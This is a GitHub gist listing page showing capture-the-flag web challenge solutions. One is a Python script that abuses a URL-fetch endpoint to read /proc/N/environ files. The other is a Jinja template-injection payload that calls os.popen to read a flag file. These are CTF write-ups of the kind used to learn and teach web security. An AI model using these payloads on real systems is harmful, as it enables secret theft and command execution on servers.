Skip to content

Instantly share code, notes, and snippets.

View DauHoangTai's full-sized avatar
🚩
Focusing

taidh DauHoangTai

🚩
Focusing
  • Duy Tan University
  • VietNam
View GitHub Profile
@DauHoangTai
DauHoangTai / CurlUp.py
Last active May 9, 2022 01:55
SDCTF web challenge solution
# python3 CurlUp.py | grep "sdctf"
import requests
from base64 import b64encode
URL = 'https://curl.sdc.tf/read/'
for i in range(1,100):
payload = b64encode(b'{"url":"file:///proc/%d/environ"}' % i).decode("utf-8") #id=9
r = requests.get(URL+payload)
if "sdctf" in r.text:
@DauHoangTai
DauHoangTai / Art Gallery.md
Last active May 8, 2022 07:54
Angstromctf 2022 - Solution web challange
@DauHoangTai
DauHoangTai / Deafcon.md
Created April 30, 2022 18:52
NahamCon CTF 2022 - Solution

Challenge Deafcon (SSTI and Normalize)

name=taidh&email=taidh@cc{{joiner.__init__.__globals__.os.popen('cat${IFS}flag*').read()}}